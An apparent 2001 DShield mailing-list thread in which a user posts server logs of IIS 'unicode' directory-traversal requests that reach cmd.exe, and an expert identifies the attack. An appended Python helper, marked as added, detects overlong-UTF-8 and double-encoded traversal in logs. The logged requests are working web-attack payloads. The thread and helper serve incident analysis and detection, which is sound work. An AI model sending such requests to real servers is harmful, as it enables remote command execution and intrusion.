[Dshield] win32 exploit?

Johannes B. Ullrich jullrich at euclidian.com
Sat Aug 4 03:51:02 GMT 2001


Looks like a regular 'unicode' attack.

On Fri, 3 Aug 2001, Joseph Shraibman wrote:

> Does anyone know what this is?
>
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
>
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
>
>
>

-- 
-------
jullrich at sans.org                    Join http://www.DShield.org
                                     Distributed Intrusion Detection System
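
The three request forms in the quoted logs can be recognised mechanically. The following is an added example, not part of the original thread: a Python log-review helper that flags overlong UTF-8 sequences (`%c0%af`, `%c1%9c`) and double percent-encoding (`%255c`), then checks the canonicalised path for directory traversal. The function names and the final benign sample line are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+?)(?: HTTP/\d\.\d)?"')
# Lead bytes 0xC0/0xC1 can only start a 2-byte form of a code point below 0x80,
# which is always an overlong (invalid) UTF-8 encoding.
OVERLONG = re.compile(rb'[\xc0\xc1][\x80-\xbf]')
PERCENT = re.compile(rb'%[0-9a-fA-F]{2}')

def fold_overlong(raw: bytes) -> bytes:
    """Replace each overlong 2-byte sequence with the ASCII byte it encodes."""
    return OVERLONG.sub(
        lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), raw)

def classify(log_line: str):
    """Return (findings, canonical_path) for one access-log line, or None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path = m.group(1).split('?', 1)[0]
    decoded = unquote_to_bytes(path)           # first percent-decoding pass
    findings = set()
    if PERCENT.search(decoded):                # escapes survive one pass
        findings.add('double-encoded')
        decoded = unquote_to_bytes(decoded)
    if OVERLONG.search(decoded):
        findings.add('overlong-utf8')
    # Canonical form: overlong bytes folded to ASCII, backslash treated as '/'.
    canon = fold_overlong(decoded).replace(b'\\', b'/')
    if b'../' in canon or canon.endswith(b'/..'):
        findings.add('traversal')
    return sorted(findings), canon.decode('utf-8', errors='replace')

# Entries from the quoted logs, rejoined onto one line; the last is constructed.
SAMPLES = [
    '216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"',
    '61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332',
    '192.0.2.10 - - [03/Aug/2001:13:25:10 -0400] "GET /caf%c3%a9/index.html HTTP/1.0" 200 1024',
]

if __name__ == '__main__':
    for line in SAMPLES:
        print(classify(line))
```

Valid multi-byte UTF-8 such as `%c3%a9` is not flagged, because only the lead bytes 0xC0 and 0xC1 are treated as overlong.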




